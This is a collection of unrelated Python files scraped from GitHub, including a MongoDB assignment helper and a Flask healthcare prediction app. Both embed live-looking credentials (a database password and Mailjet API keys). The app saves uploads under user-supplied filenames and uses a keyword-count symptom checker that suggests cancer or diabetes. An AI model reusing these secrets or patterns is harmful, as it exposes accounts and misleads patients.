splineIndex, linIndex]\n\n for m in modelIndxs:\n resDf.iloc[c,0] = officialNames[modelNames[m]]\n\n for u in range(mseMeanMU[m].shape[0]):\n sigLabel = getSigLabel(mseMUB[m][u, :], mseMUB[dktIndex][u, :], sigLevel)\n resDf.iloc[c, u+1] = '%.2f +/- %.2f%s' % (mseMeanMU[m][u], mseStdMU[m][u], sigLabel)\n\n c += 1\n\n resDf.iloc[c, 0] = 'Rank Correlation (Spearman rho)'\n c += 1\n\n for m in modelIndxs:\n resDf.iloc[c, 0] = officialNames[modelNames[m]]\n # c += 1\n\n for u in range(mseMeanMU[m].shape[0]):\n sigLabel = getSigLabel(corrMUB[m][u,:], corrMUB[dktIndex][u,:], sigLevel)\n resDf.iloc[c, u+1] = '%.2f +/- %.2f%s' % (corrMeanMU[m][u], corrStdMU[m][u], sigLabel)\n\n c += 1\n\n\n print(resDf)\n resDf.to_html('drcRes.html')\n resDf.loc[:, 'Model' : 'DTI FA Temporal'].to_latex('drcRes.tex', index=False)\n\n\ndef getSigLabel(xs, xsMyModel, sigLevel):\n tstatCorrDkt, pValCorrDkt = scipy.stats.ttest_rel(xs, xsMyModel)\n\n if pValCorrDkt < sigLevel:\n sigLabel = '*'\n else:\n sigLabel = ''\n\n return sigLabel\n\ndef runAllExpTadpoleDrc(params, expName, dpmBuilder, compareTrueParamsFunc = None):\n \"\"\" runs all experiments\"\"\"\n\n res = {}\n\n params['patientID'] = AD\n params['excludeID'] = -1\n params['excludeXvalidID'] = -1\n params['excludeStaging'] = [-1]\n\n params['outFolder'] = 'resfiles/%s' % expName\n params['expName'] = expName\n\n dpmObjStd, res['std'] = evaluationFramework.runStdDPM(params,\n expName, dpmBuilder, params['runPartMain'])\n\n # dpmObjStd.plotter.plotAllBiomkDisSpace(dpmObjStd, params, disNr=0)\n\n # perform the validation against DRC data\n res['metrics'] = validateDRCBiomk(dpmObjStd, params)\n\n\n return res\n\n\n\nif __name__ == '__main__':\n main()\n\n\n","repo_name":"razvanmarinescu/dkt","sub_path":"tadpoleDrc.py","file_name":"tadpoleDrc.py","file_ext":"py","file_size_in_byte":21152,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"44380707854","text":"import torch\nfrom PIL import Image\n\nfrom .registry import DATASETS\nfrom .base import BaseDataset\n\n\ndef rotate(img):\n \"\"\"Rotate input image with 0, 90, 180, and 270 degrees.\n\n Args:\n img (Tensor): input image of shape (C, H, W).\n\n Returns:\n list[Tensor]: A list of four rotated images.\n \"\"\"\n return [\n img,\n torch.flip(img.transpose(1, 2), [1]),\n torch.flip(img, [1, 2]),\n torch.flip(img, [1]).transpose(1, 2)\n ]\n\n\n@DATASETS.register_module\nclass RotationPredDataset(BaseDataset):\n \"\"\"Dataset for rotation prediction.\n \"\"\"\n\n def __init__(self, data_source, pipeline):\n super(RotationPredDataset, self).__init__(data_source, pipeline)\n\n def __getitem__(self, idx):\n img = self.data_source.get_sample(idx)\n assert isinstance(img, Image.Image), \\\n 'The output from the data source must be an Image, got: {}. \\\n Please ensure that the list file does not contain labels.'.format(\n type(img))\n img = self.pipeline(img)\n img = torch.stack(rotate(img), dim=0)\n rotation_labels = torch.LongTensor([0, 1, 2, 3])\n return dict(img=img, rot_label=rotation_labels)\n\n def evaluate(self, scores, keyword, logger=None):\n raise NotImplemented\n","repo_name":"WXinlong/DenseCL","sub_path":"openselfsup/datasets/rotation_pred.py","file_name":"rotation_pred.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"en","doc_type":"code","stars":523,"dataset":"github-code","pt":"48"} +{"seq_id":"31539002936","text":"import pandas as pd\r\nimport matplotlib.pyplot as plt\r\n\r\nwnba = pd.read_csv('wnba.csv')\r\n\r\n#As we increase the sample size, the sample means vary less around the population mean,\r\n#and the chances of getting an unrepresentative sample decrease.\r\n#The more representative a sample is, the smaller the sampling error.\r\nsample_means = []\r\nfor i in range(100):\r\n sample = wnba['PTS'].sample(100, random_state=i)\r\n sample_mean = sample.mean()\r\n sample_means.append(sample_mean)\r\n\r\nparameter = wnba['PTS'].mean()\r\n\r\n# We can see how sample means tend to vary less around the population mean as we increase the sample size.\r\nplt.scatter(range(1, 101), sample_means)\r\nplt.axhline(parameter, label='Parameter mean')\r\nplt.yticks(ticks=list(range(125, 325, 25)))\r\nplt.legend()\r\nplt.show()\r\n\r\n# Conclusions:\r\n# Simple random sampling isn't a reliable sampling method when the sample size is small.\r\n# When we do simple random sampling, we should try to get a sample that is as large as possible.\r\n","repo_name":"legendyen/SungJen_Python_Projects","sub_path":"DQ/Probability and Statistics with Python/2.simple_random _sampling.py","file_name":"2.simple_random _sampling.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8000502254","text":"rock = '''\r\n _______\r\n---' ____)\r\n (_____)\r\n (_____)\r\n (____)\r\n---.__(___)\r\n'''\r\n\r\npaper = '''\r\n _______\r\n---' ____)____\r\n ______)\r\n _______)\r\n _______)\r\n---.__________)\r\n'''\r\n\r\nscissors = '''\r\n _______\r\n---' ____)____\r\n ______)\r\n __________)\r\n (____)\r\n---.__(___)\r\n'''\r\n\r\n\r\ngame_images = [rock, paper, scissors]\r\nchoice = int(input(\"What do you choose? Type 0 for Rock, 1 for Paper or 2 for Scissors.\\n\"))\r\n\r\nif choice >= 3 or choice < 0:\r\n print(\"You typed an invalid number, you lose!\")\r\nelse:\r\n print(game_images[choice])\r\n import random\r\n pc_choice = random.randint(0,2)\r\n print(f\"Computer chose:\\n{game_images[pc_choice]}\")\r\n \r\n if choice == 0 and pc_choice == 2:\r\n print(\"You Win!\")\r\n elif pc_choice == 0 and choice == 2:\r\n print (\"You lose!\")\r\n elif choice > pc_choice:\r\n print(\"You Win!\")\r\n elif pc_choice > choice:\r\n print(\"You lose!\")\r\n elif choice == pc_choice:\r\n print(\"Its a draw\")\r\n","repo_name":"Mayank-2011/python-projects","sub_path":"Rock_paper_scissors.py","file_name":"Rock_paper_scissors.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73906143826","text":"T = int(input())\n\ndef calc(p1, p2, m1, m2):\n if m1 != m2:\n a = m1-m2\n b = p1*m2 - p2*m1\n c = m1*(p2**2) - m2*(p1**2)\n result1 = (-b + (b ** 2 - a * c) ** (1 / 2)) / a\n result2 = (-b - (b ** 2 - a * c) ** (1 / 2)) / a\n if (result1 > p1 and result1 < p2):\n result = result1\n else:\n result = result2\n else:\n result = (p1+p2)/2\n return result\n\n\nfor i in range(T):\n N = int(input())\n inp = input().split()\n pos = []\n mass = []\n result = []\n for j in range(N):\n pos.append(int(inp[j]))\n mass.append(int(inp[N+j]))\n for k in range(N-1):\n res = calc(pos[k], pos[k+1], mass[k], mass[k+1])\n result.append(res)\n print(\"#{}\".format(i+1), end = \" \")\n for r in result:\n print(\"{:.10f}\".format(r), end = \" \")\n print(\"\")\n","repo_name":"Kangsan-Jeon/AlgorithmTrain","sub_path":"SW_ExpertAcademy/1245_균형점.py","file_name":"1245_균형점.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"69812487187","text":"import pymongo\nfrom bson.json_util import dumps\nimport json\nfrom pymongo import MongoClient\nfrom .assignment import Assignment\nurl = \"mongodb://Archie96:hannah10@mycroft-assignment-shard-00-00-1rt5b.mongodb.net:27017,mycroft-assignment-shard-00-01-1rt5b.mongodb.net:27017,mycroft-assignment-shard-00-02-1rt5b.mongodb.net:27017/test?ssl=true&replicaSet=Mycroft-Assignment-shard-0&authSource=admin&retryWrites=true\"\nassignments_collection = \"Assignments\"\nclass db_helper(object):\n \n def __init__(self, studentID):\n #setup connection to database\n self.client = MongoClient(url)\n #set which student's collection of data we will be working with\n self._db = self.client[studentID]\n self._assignment_collection = None\n\n @property\n def db(self):\n return self._db\n\n @db.setter\n def db(self, value):\n #setter for db\n self._db = value\n\n @property\n def assignment_collection(self):\n return self._assignment_collection\n\n @assignment_collection.setter\n def assignment_collection(self, value):\n self._assignment_collection = value\n\n def pushAssignment(self, newAssignment):\n\n assignment = {\"date_issued\": newAssignment.date_issued,\n \"module_id\": newAssignment.module_id,\n \"due_date\": newAssignment.due_date,\n \"total_percentage\": newAssignment.total_per,\n \"accumulated_percentage\": newAssignment.acc_per,\n \"assignment_type\": newAssignment.assignment_type,\n \"name\": newAssignment.name \n }\n\n self.assignment_collection = self.db[assignments_collection]\n\n #checks to see if assignment name is already in the module collection, if so return\n #without pushing anything\n\n for document in self.assignment_collection.find():\n if newAssignment.name == self.parseAssignment(document).name:\n print(\"Assignment name already exists\")\n return 0\n\n print(\"yurting\") \n post_id = self.assignment_collection.insert_one(assignment).inserted_id\n return 1\n \n def getAllAssignments(self):\n self.assignment_collection = self.db[assignments_collection]\n assignments = []\n \n for assignment_bson in self.assignment_collection.find({}):\n assignment = self.parseAssignment(assignment_bson)\n if not assignment:\n return None\n assignments.append(assignment)\n if len(assignments) == 0:\n return None\n return assignments\n\n def getAssignment(self, assignment_name):\n self.assignment_collection = self.db[assignments_collection]\n assignment_uni = self.assignment_collection.find_one({\"name\": assignment_name})\n if not assignment_uni:\n print(\"Error - Could not find an assignment with that name\")\n return\n\n return self.parseAssignment(assignment_uni)\n \n def getAllModuleAssignments(self, module_id):\n all_assignments = self.getAllAssignments()\n module_assignments = []\n\n for assignment in all_assignments:\n if module_id == assignment.module_id:\n module_assignments.append(assignment)\n \n return module_assignments\n\n def parseAssignment(self, assignment_Bson):\n #dumps the BSON dictionary into a usable JSON format\n assignment_json = dumps(assignment_Bson)\n #formats the JSON in a way so that we can extract members of the JSON object\n #Assigns the members of this object to an assignment class which is then returned\n j = json.loads(assignment_json)\n return Assignment(j['date_issued'], j['module_id'], j['due_date'], j['total_percentage'],\n j['accumulated_percentage'], j['assignment_type'], j['name'])\n\n #gets the number of assignments for a given module\n def assignmentCount(self):\n self.assignment_collection = self.db[assignments_collection]\n return self.assignment_collection.count()\n \n #These update functions could possibly be squished into one function, taking two parameters, the name of the field and the new value\n #Might look into refining it later down the line\n\n #update assignment due date\n def updateAssignmentDueDate(self, assignment_name, new_due_date):\n self.assignment_collection = self.db[assignments_collection]\n try:\n self.assignment_collection.update_one(\n {\"name\":assignment_name},\n { \"$set\":\n {\n \"due_date\":new_due_date\n }\n }, upsert=False)\n except pymongo.errors.PyMongoError as e:\n print(e) \n\n #update total percentage for assignment\n def updateAssignmentTotalPer(self, assignment_name, new_total_per):\n self.assignment_collection = self.db[assignments_collection]\n try:\n self.assignment_collection.update_one(\n {\"name\":assignment_name},\n { \"$set\":\n {\n \"total_percentage\":new_total_per\n }\n }, upsert=False)\n except pymongo.errors.PyMongoError as e:\n print(e)\n\n #update accumulated percentage\n def updateAssignmentAccPer(self, assignment_name, new_accumulated_per):\n self.assignment_collection = self.db[assignments_collection]\n try:\n self.assignment_collection.update_one(\n {\"name\":assignment_name},\n { \"$set\":\n {\n \"accumulated_percentage\":new_accumulated_per\n }\n }, upsert=False)\n except pymongo.errors.PyMongoError as e:\n print(e) \n\n #update assignment type\n def updateAssignmentType(self, assignment_name, new_assignment_type):\n self.assignment_collection = self.db[assignments_collection]\n try:\n self.assignment_collection.update_one(\n {\"name\":assignment_name},\n { \"$set\":\n {\n \"assignment_type\":new_assignment_type\n }\n }, upsert=False)\n except pymongo.errors.PyMongoError as e:\n print(e) \n\n #update assignment name\n def updateAssignmentName(self, assignment_name, new_assignment_name):\n self.assignment_collection = self.db[assignments_collection]\n try:\n self.assignment_collection.update_one(\n {\"name\":assignment_name},\n { \"$set\":\n {\n \"name\":new_assignment_name\n }\n }, upsert=False)\n except pymongo.errors.PyMongoError as e:\n print(e) \n\n #remove a given assignment\n def removeAssignment(self, assignment_name):\n self.assignment_collection = self.db[assignments_collection]\n self.assignment_collection.remove({\"name\":assignment_name})\n\n #def removeModule(self, module_id):\n\n\n","repo_name":"BrianArch96/Mycroft-assignment","sub_path":"db/db_helper.py","file_name":"db_helper.py","file_ext":"py","file_size_in_byte":7115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"212029731","text":"#Important Modules\nfrom flask import Flask,render_template, url_for ,flash , redirect\n#from forms import RegistrationForm, LoginForm\nfrom sklearn.externals import joblib\nfrom flask import request\nimport numpy as np\nimport tensorflow\n#from keras.layers import Conv2D, MaxPooling2D, Dense, Dropout, Input, Flatten, SeparableConv2D\n#from flask_sqlalchemy import SQLAlchemy\n#from model_class import DiabetesCheck, CancerCheck\n\n#from tensorflow.keras.models import Sequential\n#from tensorflow.keras.layers import Conv2D, MaxPooling2D, Dense, Dropout, Input, Flatten, SeparableConv2D\n#from tensorflow.keras.layers import GlobalMaxPooling2D, Activation\n#from tensorflow.keras.layers.normalization import BatchNormalization\n#from tensorflow.keras.layers.merge import Concatenate\n#from tensorflow.keras.models import Model\n\nimport os\nfrom flask import send_from_directory\nfrom tensorflow.keras.models import load_model\nfrom tensorflow.keras.preprocessing import image\nimport tensorflow as tf\n\n#from this import SQLAlchemy\napp=Flask(__name__,template_folder='template')\n\n\n\n# RELATED TO THE SQL DATABASE\napp.config['SECRET_KEY'] = '5791628bb0b13ce0c676dfde280ba245'\n#app.config[\"SQLALCHEMY_DATABASE_URI\"] = \"sqlite:///site.db\"\n#db=SQLAlchemy(app)\n\n#from model import User,Post\n\n#//////////////////////////////////////////////////////////\n\ndir_path = os.path.dirname(os.path.realpath(__file__))\n# UPLOAD_FOLDER = dir_path + '/uploads'\n# STATIC_FOLDER = dir_path + '/static'\nUPLOAD_FOLDER = 'uploads'\nSTATIC_FOLDER = 'static'\n\n#graph = tf.get_default_graph()\n#with graph.as_default():;\nfrom tensorflow.keras.models import load_model\nmodel = load_model('model111.h5')\nmodel222=load_model(\"my_model.h5\")\n\n#FOR THE FIRST MODEL\n\n# call model to predict an image\ndef api(full_path):\n data = image.load_img(full_path, target_size=(50, 50, 3))\n data = np.expand_dims(data, axis=0)\n data = data * 1.0 / 255\n\n #with graph.as_default():\n predicted = model.predict(data)\n return predicted\n#FOR THE SECOND MODEL\ndef api1(full_path):\n data = image.load_img(full_path, target_size=(64, 64, 3))\n data = np.expand_dims(data, axis=0)\n data = data * 1.0 / 255\n\n #with graph.as_default():\n predicted = model222.predict(data)\n return predicted\n\n\n# home page\n\n#@app.route('/')\n#def home():\n # return render_template('index.html')\n\n\n# procesing uploaded file and predict it\n@app.route('/upload', methods=['POST','GET'])\ndef upload_file():\n\n if request.method == 'GET':\n return render_template('index.html')\n else:\n try:\n file = request.files['image']\n full_name = os.path.join(UPLOAD_FOLDER, file.filename)\n file.save(full_name)\n\n indices = {0: 'PARASITIC', 1: 'Uninfected', 2: 'Invasive carcinomar', 3: 'Normal'}\n result = api(full_name)\n print(result)\n\n predicted_class = np.asscalar(np.argmax(result, axis=1))\n accuracy = round(result[0][predicted_class] * 100, 2)\n label = indices[predicted_class]\n return render_template('predict.html', image_file_name = file.filename, label = label, accuracy = accuracy)\n except:\n flash(\"Please select the image first !!\", \"danger\") \n return redirect(url_for(\"Malaria\"))\n\n@app.route('/upload11', methods=['POST','GET'])\ndef upload11_file():\n\n if request.method == 'GET':\n return render_template('index2.html')\n else:\n try:\n file = request.files['image']\n full_name = os.path.join(UPLOAD_FOLDER, file.filename)\n file.save(full_name)\n indices = {0: 'Normal', 1: 'Pneumonia'}\n result = api1(full_name)\n if(result>50):\n label= indices[1]\n accuracy= result\n else:\n label= indices[0]\n accuracy= 100-result\n return render_template('predict1.html', image_file_name = file.filename, label = label, accuracy = accuracy)\n except:\n flash(\"Please select the image first !!\", \"danger\") \n return redirect(url_for(\"Pneumonia\"))\n\n\n@app.route('/uploads/')\ndef send_file(filename):\n return send_from_directory(UPLOAD_FOLDER, filename)\n\n\n\n\n\n\n#//////////////////////////////////////////////\n\n#app.config[\"SQLALCHEMY_DATABASE_URI\"] = \"sqlite:///site.db\"\n\n#db=SQLAlchemy(app)\n\n#class User(db.Model):\n## username = db.Column(db.String(20), unique=True, nullable=False)\n # email = db.Column(db.String(120), unique=True, nullable=False)\n #image_file = db.Column(db.String(20), nullable=False, default='default.jpg')\n # password = db.Column(db.String(60), nullable=False)\n #posts = db.relationship('Post', backref='author', lazy=True)\n\n #def __repr__(self):\n # return f\"User('{self.username}', '{self.email}', '{self.image_file}')\"\n\n\n@app.route(\"/\")\n\n@app.route(\"/home\")\ndef home():\n return render_template(\"home.html\")\n \n\n@app.route(\"/about\")\ndef about():\n return render_template(\"about.html\")\n\n\n@app.route(\"/cancer\")\ndef cancer():\n return render_template(\"cancer.html\")\n\n\n@app.route(\"/diabetes\")\ndef diabetes():\n #if form.validate_on_submit():\n return render_template(\"diabetes.html\")\n\n@app.route(\"/heart\")\ndef heart():\n return render_template(\"heart.html\")\n\n\n@app.route(\"/liver\")\ndef liver():\n #if form.validate_on_submit():\n return render_template(\"liver.html\")\n\n@app.route(\"/kidney\")\ndef kidney():\n #if form.validate_on_submit():\n return render_template(\"kidney.html\")\n\n@app.route(\"/Malaria\")\ndef Malaria():\n return render_template(\"index.html\")\n\n@app.route(\"/Pneumonia\")\ndef Pneumonia():\n return render_template(\"index2.html\")\n\n\n\"\"\"\n@app.route(\"/register\", methods=[\"GET\", \"POST\"])\ndef register():\n form =RegistrationForm()\n if form.validate_on_submit():\n #flash(\"Account created for {form.username.data}!\".format(\"success\"))\n flash(\"Account created\",\"success\") \n return redirect(url_for(\"home\"))\n return render_template(\"register.html\", title =\"Register\",form=form )\n@app.route(\"/login\", methods=[\"POST\",\"GET\"])\ndef login():\n form =LoginForm()\n if form.validate_on_submit():\n #if form.email.data ==\"sho\" and form.password.data==\"password\":\n flash(\"You Have Logged in !\",\"success\")\n return redirect(url_for(\"home\"))\n #else:\n # flash(\"Login Unsuccessful. Please check username and password\",\"danger\")\n return render_template(\"login.html\", title =\"Login\",form=form )\ndef ValuePredictor1(to_predict_list):\n to_predict = np.array(to_predict_list).reshape(1,30)\n loaded_model = joblib.load(\"model\")\n result = loaded_model.predict(to_predict)\n return result[0]\n \n@app.route('/result1',methods = [\"GET\",\"POST\"])\ndef result():\n if request.method == 'POST':\n to_predict_list = request.form.to_dict()\n to_predict_list=list(to_predict_list.values())\n to_predict_list = list(map(float, to_predict_list))\n result = ValuePredictor(to_predict_list)\n if int(result)==1:\n prediction='cancer'\n else:\n prediction='Healthy' \n return(render_template(\"result.html\", prediction=prediction))\"\"\"\n\n\n\ndef ValuePredictor(to_predict_list, size):\n to_predict = np.array(to_predict_list).reshape(1,size)\n if(size==8):#Diabetes\n loaded_model = joblib.load(\"model1\")\n result = loaded_model.predict(to_predict)\n elif(size==30):#Cancer\n loaded_model = joblib.load(\"model\")\n result = loaded_model.predict(to_predict)\n elif(size==12):#Kidney\n loaded_model = joblib.load(\"model3\")\n result = loaded_model.predict(to_predict)\n elif(size==10):\n loaded_model = joblib.load(\"model4\")\n result = loaded_model.predict(to_predict)\n elif(size==11):#Heart\n loaded_model = joblib.load(\"model2\")\n result =loaded_model.predict(to_predict)\n return result[0]\n\n@app.route('/result',methods = [\"POST\"])\ndef result():\n result = 0\n if request.method == 'POST':\n to_predict_list = request.form.to_dict()\n to_predict_list=list(to_predict_list.values())\n to_predict_list = list(map(float, to_predict_list))\n if(len(to_predict_list)==30):#Cancer\n result = ValuePredictor(to_predict_list,30)\n elif(len(to_predict_list)==8):#Daiabtes\n result = ValuePredictor(to_predict_list,8)\n elif(len(to_predict_list)==12):\n result = ValuePredictor(to_predict_list,12)\n elif(len(to_predict_list)==11):\n result = ValuePredictor(to_predict_list,11)\n #if int(result)==1:\n # prediction ='diabetes'\n #else:\n # prediction='Healthy' \n elif(len(to_predict_list)==10):\n result = ValuePredictor(to_predict_list,10)\n if(int(result)==1):\n prediction='Sorry ! Suffering'\n else:\n prediction='Congrats ! you are Healthy'\n send_mail(msg=prediction)\n return(render_template(\"result.html\", prediction=prediction))\n\n@app.route(\"/checkup\", methods = [\"GET\", \"POST\"])\ndef diagnose():\n symptoms = []\n mail = ''\n name = ''\n if request.method == 'POST':\n to_predict_list = request.form.to_dict()\n print(to_predict_list)\n to_predict_list=list(to_predict_list.values())\n name = to_predict_list[0]\n mail = to_predict_list[1]\n symptoms = request.form.getlist('symptoms')\n print(symptoms)\n prediction = diagnose_disease(symptoms=symptoms)\n send_mail(mail=mail, name=name, msg=prediction)\n return(render_template(\"checkup.html\", prediction=prediction))\n\ndef send_mail(mail='chanchalsoni0722@gmail.com', name='test', msg='test message'):\n from mailjet_rest import Client\n import os\n api_key = 'b23e7953200c5b2563f30245220af99f'\n api_secret = '6d34ef6f4f14ed4c1cb81cb15d5e8b29'\n mailjet = Client(auth=(api_key, api_secret), version='v3.1')\n data = {\n 'Messages': [\n {\n \"From\": {\n \"Email\": \"chanchalsoni0722@gmail.com\",\n \"Name\": \"Smart Healthcare\"\n },\n \"To\": [\n {\n \"Email\": mail,\n \"Name\": name\n }\n ],\n \"Subject\": \"Greetings from Smart Healthcare.\",\n \"TextPart\": \"Health Report\",\n \"HTMLPart\": f\"

Dear {name}

, Hope you and your family is healthy and happy.
{msg}
After this report please don't forget to consult with doctors.
May god bless you!\",\n \"CustomID\": \"Smart Healthcare\"\n }\n ]\n }\n result = mailjet.send.create(data=data)\n print(result.status_code)\n print(result.json())\n\n\ndef diagnose_disease(symptoms):\n cancer = ['bloating', 'pelvic pain', 'abdominal pain', 'difficulty eating', 'feeling full quickly', 'urinary urgency']\n diabetes = ['urinate', 'blurry vision', 'very tired', 'dry skin', 'very hungry']\n flu = ['fever', 'running nose', 'headache', 'bodyache', 'ache', 'pain']\n\n cancer_pts = 0\n flu_pts = 0\n diabetes_pts = 0\n\n for s in symptoms:\n cancer_pts = cancer_pts + cancer.count(s)\n flu_pts = flu_pts + flu.count(s)\n diabetes_pts = diabetes_pts + diabetes.count(s)\n\n if cancer_pts > flu_pts and cancer_pts > diabetes_pts:\n return 'You may suffer from cancer. Please go check for cancer test.'\n elif flu_pts > cancer_pts and flu_pts > diabetes_pts:\n return 'You may suffer from flu. Yo don\\'t need any test. Just need to consult a doctor.'\n else:\n return 'You may suffer from diabetes. Please go check for diabetes test.'\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","repo_name":"soni-chanchal/AI-ML-Medical-Technology","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":11595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40150432752","text":"import re\n\nclass BingoCard:\n \n def __init__(self, numbers):\n self.numbers = numbers.copy()\n self.marked = [[False]*5 for _ in range(5)]\n \n def __repr__(self):\n return '\\n'.join([' '.join([str(number) for number in line]) for line in self.numbers])\n \n def mark(self, mark_number):\n for line_number, line in enumerate(self.numbers):\n for index, number in enumerate(line):\n if number == mark_number:\n self.marked[line_number][index] = True\n return\n \n def is_bingo(self):\n for i in range(5):\n if all(self.marked[i]) or all(self.marked[j][i] for j in range(5)):\n return True\n return False\n\n \n def score(self, drawn_number):\n unmarked_sum = 0\n for i in range(5):\n for j in range(5):\n unmarked_sum += self.numbers[i][j] if not self.marked[i][j] else 0\n return unmarked_sum * drawn_number\n\ncards = []\nr = r'([0-9]+[ ]*)'\nwith open('input/day4.txt', 'r', encoding='utf8') as file:\n drawn_numbers = [int(number) for number in file.readline().split(',')]\n file.readline() # skip line\n numbers = []\n for line in file:\n if line == '\\n':\n cards.append(BingoCard(numbers))\n numbers = []\n else:\n numbers.append([int(m.strip()) for m in re.findall(r,line)])\n cards.append(BingoCard(numbers))\n\n# Part 1\nfor drawn_number in drawn_numbers:\n for card in cards:\n card.mark(drawn_number)\n winners = [card for card in cards if card.is_bingo()]\n if winners:\n winner = winners[0]\n print(winner.score(drawn_number))\n break\n\n# Part 2\nfor drawn_number in drawn_numbers:\n drawn_number = int(drawn_number)\n for card in cards:\n card.mark(drawn_number)\n if len(cards) == 1:\n last_card = cards[0]\n cards = [card for card in cards if not card.is_bingo()]\n if len(cards) == 0:\n print(last_card.score(drawn_number))\n break","repo_name":"andrew-paul-thompson/advent-of-code-2021","sub_path":"day4.py","file_name":"day4.py","file_ext":"py","file_size_in_byte":2036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21370571602","text":"import gi\ngi.require_version('Gtk', '4.0')\nfrom gi.repository import Gtk\n\nfrom .Config import Config\nfrom .Users import Users\nfrom .MainWindow import MainWindow\nfrom . import Common\n\n_tr = Config._tr\n\n\nclass UsersMenu:\n\n def __init__(self):\n\n self.menu_gui()\n\n\n def menu_gui(self):\n \"\"\"\n Generate menu GUI.\n \"\"\"\n\n # Popover\n self.menu_po = Gtk.Popover()\n\n # Grid (main)\n main_grid = Common.menu_main_grid()\n self.menu_po.set_child(main_grid)\n\n # Label - menu title (Users)\n label = Common.menu_title_label(_tr(\"Users\"))\n main_grid.attach(label, 0, 0, 1, 1)\n\n # Notebook\n notebook = Gtk.Notebook()\n notebook.set_hexpand(True)\n notebook.set_vexpand(True)\n main_grid.attach(notebook, 0, 1, 1, 1)\n\n # Tab pages and ScrolledWindow\n # \"Add/Remove Columns\" tab\n label = Gtk.Label()\n label.set_label(_tr(\"Add/Remove Columns\"))\n self.grid_add_remove_columns_tab = Gtk.Grid()\n self.grid_add_remove_columns_tab.set_margin_top(15)\n self.grid_add_remove_columns_tab.set_margin_bottom(5)\n self.grid_add_remove_columns_tab.set_margin_start(5)\n self.grid_add_remove_columns_tab.set_margin_end(5)\n self.grid_add_remove_columns_tab.set_row_spacing(5)\n notebook.append_page(self.grid_add_remove_columns_tab, label)\n\n # Button (Reset)\n self.reset_button = Common.reset_button()\n main_grid.attach(self.reset_button, 0, 2, 1, 1)\n\n # \"Add/Remove Columns\" tab GUI\n self.add_remove_columns_tab_gui()\n\n # GUI signals\n self.gui_signals()\n\n\n def add_remove_columns_tab_gui(self):\n \"\"\"\n Generate \"Add/Remove Columns\" tab GUI objects.\n \"\"\"\n\n # Grid\n grid = Gtk.Grid()\n grid.set_margin_top(5)\n grid.set_margin_bottom(5)\n grid.set_margin_start(5)\n grid.set_margin_end(5)\n grid.set_column_spacing(10)\n grid.set_row_spacing(3)\n self.grid_add_remove_columns_tab.attach(grid, 0, 0, 1, 1)\n\n # Label - tab title (Add/Remove Columns)\n label = Common.title_label(_tr(\"Add/Remove Columns\"))\n grid.attach(label, 0, 0, 2, 1)\n\n # CheckButton (User)\n self.user_cb = Common.checkbutton(_tr(\"User\"), None)\n self.user_cb.set_active(True)\n self.user_cb.set_sensitive(False)\n grid.attach(self.user_cb, 0, 1, 1, 1)\n\n # CheckButton (Full Name)\n self.full_name_cb = Common.checkbutton(_tr(\"Full Name\"), None)\n grid.attach(self.full_name_cb, 0, 2, 1, 1)\n\n # CheckButton (Logged In)\n self.logged_in_cb = Common.checkbutton(_tr(\"Logged In\"), None)\n grid.attach(self.logged_in_cb, 0, 3, 1, 1)\n\n # CheckButton (UID)\n self.uid_cb = Common.checkbutton(_tr(\"UID\"), None)\n grid.attach(self.uid_cb, 0, 4, 1, 1)\n\n # CheckButton (GID)\n self.gid_cb = Common.checkbutton(_tr(\"GID\"), None)\n grid.attach(self.gid_cb, 0, 5, 1, 1)\n\n # CheckButton (Processes)\n self.processes_cb = Common.checkbutton(_tr(\"Processes\"), None)\n grid.attach(self.processes_cb, 0, 6, 1, 1)\n\n # CheckButton (Home Directory)\n self.home_directory_cb = Common.checkbutton(_tr(\"Home Directory\"), None)\n grid.attach(self.home_directory_cb, 1, 1, 1, 1)\n\n # CheckButton (Group)\n self.group_cb = Common.checkbutton(_tr(\"Group\"), None)\n grid.attach(self.group_cb, 1, 2, 1, 1)\n\n # CheckButton (Terminal)\n self.terminal_cb = Common.checkbutton(_tr(\"Terminal\"), None)\n grid.attach(self.terminal_cb, 1, 3, 1, 1)\n\n # CheckButton (Start Time)\n self.start_time_cb = Common.checkbutton(_tr(\"Start Time\"), None)\n grid.attach(self.start_time_cb, 1, 4, 1, 1)\n\n # CheckButton (CPU)\n self.cpu_cb = Common.checkbutton(_tr(\"CPU\"), None)\n grid.attach(self.cpu_cb, 1, 5, 1, 1)\n\n\n def gui_signals(self):\n \"\"\"\n Connect GUI signals.\n \"\"\"\n\n self.menu_po.connect(\"show\", self.on_menu_po_show)\n self.reset_button.connect(\"clicked\", self.on_reset_button_clicked)\n\n\n def connect_signals(self):\n \"\"\"\n Connect some of the signals to be able to disconnect them for setting GUI.\n \"\"\"\n\n self.user_cb.connect(\"toggled\", self.on_add_remove_checkbuttons_toggled)\n self.full_name_cb.connect(\"toggled\", self.on_add_remove_checkbuttons_toggled)\n self.logged_in_cb.connect(\"toggled\", self.on_add_remove_checkbuttons_toggled)\n self.uid_cb.connect(\"toggled\", self.on_add_remove_checkbuttons_toggled)\n self.gid_cb.connect(\"toggled\", self.on_add_remove_checkbuttons_toggled)\n self.processes_cb.connect(\"toggled\", self.on_add_remove_checkbuttons_toggled)\n self.home_directory_cb.connect(\"toggled\", self.on_add_remove_checkbuttons_toggled)\n self.group_cb.connect(\"toggled\", self.on_add_remove_checkbuttons_toggled)\n self.terminal_cb.connect(\"toggled\", self.on_add_remove_checkbuttons_toggled)\n self.start_time_cb.connect(\"toggled\", self.on_add_remove_checkbuttons_toggled)\n self.cpu_cb.connect(\"toggled\", self.on_add_remove_checkbuttons_toggled)\n\n\n def disconnect_signals(self):\n \"\"\"\n Disconnect some of the signals for setting GUI.\n \"\"\"\n\n 